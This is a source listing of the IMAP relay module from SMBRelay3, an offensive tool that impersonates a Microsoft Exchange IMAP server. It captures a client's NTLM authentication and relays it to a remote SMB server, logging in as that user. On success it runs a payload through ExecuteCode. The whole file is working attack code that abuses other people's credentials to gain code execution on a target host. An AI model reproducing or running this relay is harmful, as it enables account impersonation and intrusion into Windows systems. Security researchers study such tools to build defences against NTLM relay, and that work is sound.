Smbrelay version 3: C:/Web/smbrelay3/src/imaprelay.cpp Source File

00001 /*
00002     SMBRelay3 - IMAP REPLAY ATTACK MODULE
00003     -------------------------------------
00004 
00005 
00006 */
00007 
00008 
00009 #include "imaprelay.h"
00010 #include "payload.h"
00011 
00012 extern int verbose;
00013 
00014 int HandleIncommingIMAPRequest(RELAY *relay, char *destinationhostname, int destinationport)
00015 {
00016         char buffer[4096];
00017         char buf[4096];
00018         char buf1[4096];
00019         char buf2[4096];
00020 
00021         char CurrentUserName[256];
00022         char CurrentDomain[256];
00023         char CurrentWorkstation[256];
00024         smheader *SmbPacket1, *SmbPacket2, *SmbPacket3, *NegotiateProtocol;
00025     tSmbNtlmAuthRequest *request;
00026         
00027         uint16 packetlen;
00028         int i;
00029     char *p;
00030     char opt[5];
00031         const char WelcomeMessage[]= "* OK Microsoft Exchange Server 2007 IMAP4 service ready\r\n";
00032 
00033    // #define ERROR "-ERR The specified authentication package is not supported.\r\n"
00034     //#define CAPA "* CAPABILITY IMAP4 IMAP4rev1 IDLE LITERAL+ AUTH=NTLM\r\n0000 OK CAPABILITY completed.\r\n"
00035 
00036     
00037     //#define AUTH "+OK The operation completed successfully.\r\nNTLM\r\n.\r\n"
00038     #define AUTHOK "0001 OK AUTHENTICATE NTLM completed.\r\n"
00039     #define AUTHERROR "0001 ERROR AUTHENTICATE NTLM Failed.\r\n"
00040     
00041 
00042     printf("[+] Sending IMAP Banner\n");
00043     i=SendBytesAndWaitForResponse(relay->source,(char*)WelcomeMessage, (int)strlen(WelcomeMessage), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00044         if (i<=0){
00045                 printf("Error Reading IMAP Client message\n");
00046         return(0);
00047         }
00048     
00049     if (memcmp(buffer+4," CAPABILITY",11)==0) {
00050                 printf("[+] CAPABILITY Request from client\n");
00051         memcpy(opt,buffer,4); opt[4]='\0';
00052         sprintf(buffer,"* CAPABILITY IMAP4 IMAP4rev1 IDLE LITERAL+ AUTH=NTLM\r\n%s OK CAPABILITY completed.\r\n",opt);
00053         i=SendBytesAndWaitForResponse(relay->source,buffer, strlen(buffer), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00054         if (i<=0) return(0);
00055         buffer[i]='\0';
00056         }
00057 
00058 
00059     if (memcmp(buffer+4," AUTHENTICATE NTLM",18)!=0) {
00060         printf("[-] Not supported option %s received\n",buffer);
00061         i=SendBytesAndWaitForResponse(relay->source,(char*)AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00062         return(0);
00063     }
00064     if (strlen(buffer)>24){
00065         printf("[+] received AUTH NTLM message\n");
00066         memset((char*)&buf1,'\0',sizeof(buf1));
00067             packetlen=from64tobits(buf1, buffer+22);
00068         request=(tSmbNtlmAuthRequest *)buf1;
00069         dumpAuthRequest(0,request);
00070     } else {
00071         memset(buffer,'\0',sizeof(buffer));
00072         i=SendBytesAndWaitForResponse(relay->source,"+\r\n", 3, buffer,sizeof(buffer),SMBWAITTIMEOUT);
00073         if (i<=0){
00074                     printf("[-] Error Auth response with NTLM type1 packet\n");
00075             return(0);
00076             }
00077         buffer[i]='\0';
00078         printf("[+] received AUTH NTLM message\n");
00079         memset((char*)&buf1,'\0',sizeof(buf1));
00080             packetlen=from64tobits(buf1, buffer);        
00081         request=(tSmbNtlmAuthRequest *)buf1;
00082         
00083         if (debug) {
00084             printf("[+] received AUTH NTLM message: %s\n",buffer);
00085             DumpMem(buf1,packetlen);
00086             dumpAuthRequest(0,request);
00087         }
00088     }
00089     
00090 
00091         //Init Replay Attack
00092     i=ConnectToRemoteHost(relay,destinationhostname,destinationport);
00093         if (!i) {
00094                 printf("[-] Unable to connect to remote host %s:%i\n",destinationhostname,destinationport); 
00095                 return(0);
00096         }
00097         printf("[+] Sending SMB Protocol Authentication Handshake\n");
00098     p = AddDialect(NULL,"PC NETWORK PROGRAM 1.0",0x02, &i);
00099     p = AddDialect(p,"LANMAN1.0", 0x02,&i);
00100     p = AddDialect(p,"Windows for Workgroups 3.1a", 0x02,&i);
00101     p = AddDialect(p,"LM1.2X002", 0x02,&i);
00102     p = AddDialect(p,"LANMAN2.1", 0x02,&i);
00103     p = AddDialect(p,"NT LM 0.12", 0x02,&i);
00104         NegotiateProtocol=BuildSmbPacket(NULL,NEGOTIATEPROTOCOLREQUEST,0,p,i);
00105     free(p);
00106     i=SendBytesAndWaitForResponse(relay->destination,(char*)NegotiateProtocol,SmbPacketLen(NegotiateProtocol),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00107     free(NegotiateProtocol);
00108         if (i<=0){
00109                 printf("[-] Initial SMBHandShake (LanManager Negotiation) Failed\n");
00110         return(0);
00111         }
00112         
00113         SmbPacket1=BuildSmbPacket1();
00114         if (debug)  {
00115                 printf("\n[+] Dumping SMB Packet With NTLM Message Type 1\n");
00116                 DumpMem((char*)SmbPacket1,SmbPacketLen(SmbPacket1));
00117         }
00118 
00119         SmbPacket2=GetSmbPacket2(relay,SmbPacket1);
00120         if  (SmbPacket2==NULL) {
00121                 printf("[-] Unable to receive SMB Packet with NTLM Message Type 2\n");
00122         return(0);
00123         }
00124         printf("[+] Received SMB Message with NTLM message type 2 packet\n");
00125         memcpy((char*)&packetlen,GetNTLMPacketFromSmbPacket(SmbPacket2)-4,2);
00126 
00127     if (debug) {
00128         printf("[*] SMB Packet Dump:\n");
00129         DumpMem((char*)SmbPacket2,SmbPacketLen(SmbPacket2));
00130         printf("[*] NTLM Challenge packet from SMB message\n");
00131         DumpMem((char*)GetNTLMPacketFromSmbPacket(SmbPacket2),packetlen);
00132         dumpAuthChallenge(0,(tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2));
00133     }
00134                 
00135     ((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->flags=0xb207;
00136         memset(buf1,'\0',sizeof(buf1));
00137         to64frombits((unsigned char*)&buf1, (unsigned char*)GetNTLMPacketFromSmbPacket(SmbPacket2), packetlen);
00138         sprintf(buf,"+ %s\r\n",buf1);
00139 
00140         printf("[+] Replaying NTLM Challenge from SMB Server to the IMAP Client\n");
00141         if (debug)
00142         {
00143                 printf("[+] Sending SMTP Response: %s\n",buf);
00144         }   
00145     i=SendBytesAndWaitForResponse(relay->source,(char*)buf,(int)strlen(buf),(char*)buffer,sizeof(buffer),SMBWAITTIMEOUT);
00146         if (i<=0)
00147         {
00148                 printf("[-] Unable to read NTLM packet 3 from IMAP client\n");
00149         return(0);
00150         }
00151     buffer[i]='\0';
00152 
00153     if (debug) printf("[*] Response: %s\n",buffer);
00154         memset((char*)buf1,'\0',sizeof(buf1));
00155         packetlen=from64tobits(buf1, buffer);
00156     if (debug) {
00157         
00158                     printf("[*] Raw authorization packet (len: %i)\n",packetlen);
00159                     DumpMem(buf1,packetlen);
00160             dumpAuthResponse(0,(tSmbNtlmAuthResponse*)buf1);    
00161         }
00162 
00163     
00164         GetNTLMPacketInfo((tSmbNtlmAuthResponse*)buf1,(char*)&CurrentUserName, (char*)&CurrentDomain, (char*)&CurrentWorkstation,verbose);
00165         printf("[+] Trying to authenticate to remote SMB as %s\n",CurrentUserName);
00166         buildAuthResponse((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2),(tSmbNtlmAuthResponse*)buf2,0,CurrentUserName,NULL,NULL,CurrentWorkstation, (tSmbNtlmAuthResponse*)buf1);
00167     SmbPacket3=BuildSmbPacket((smheader*)SmbPacket2,SESSIONSETUPANDX,0,buf2,(int)SmbLength((tSmbNtlmAuthResponse *)buf2));
00168     
00169 
00170         printf("[+] Sending Final SMB Authentication packet with NTLM Message type 3\n");
00171         if (debug) 
00172         {
00173                 DumpMem((char*)SmbPacket3, SmbPacketLen(SmbPacket3));
00174         }
00175 
00176     i=SendBytesAndWaitForResponse(relay->destination,(char*)SmbPacket3, SmbPacketLen(SmbPacket3),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00177         if (i<=0){
00178                 printf("[-] Error reading Server Authentication Response\n");
00179         i=SendBytesAndWaitForResponse(relay->source,AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00180         return(0);
00181         }
00182         if (debug)  {
00183                 printf("[*] SessionSetupAndX Completed - Dumping received packet\n");
00184                 DumpMem(buf,i);
00185         }
00186 
00187         if (((smheader*)buf)->NtStatus!=0x00000000) {
00188                 printf("[-] SessionSetupAndX Completed\n[-] Authentication against Remote Host Failed\n");
00189         i=SendBytesAndWaitForResponse(relay->source,AUTHOK, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00190         return(0);
00191         }
00192     if ( ((SessionSetupAndXResponse*)((smheader*)buf)->buffer)->Action & 0x0001 )
00193     {
00194          printf("[-] Authentication against Remote Host Failed. (Connected as Guest)\n");
00195          i=SendBytesAndWaitForResponse(relay->source,AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00196          
00197         return(0);
00198     }
00199                 
00200         //WriteDataToReportFile("log.txt", (tSmbNtlmAuthResponse*)buf1, destinationhostname,(unsigned char*)((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->challengeData);
00201         
00202         printf("[+] SessionSetupAndX Completed \n");
00203         printf("[+] Authenticacion against %s Succeed with username %s\n",destinationhostname,CurrentUserName);
00204     i=SendBytesAndWaitForResponse(relay->source,AUTHOK, strlen(AUTHOK), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00205         ExecuteCode( *relay);
00206 
00207     return(1);
00208 
00209 }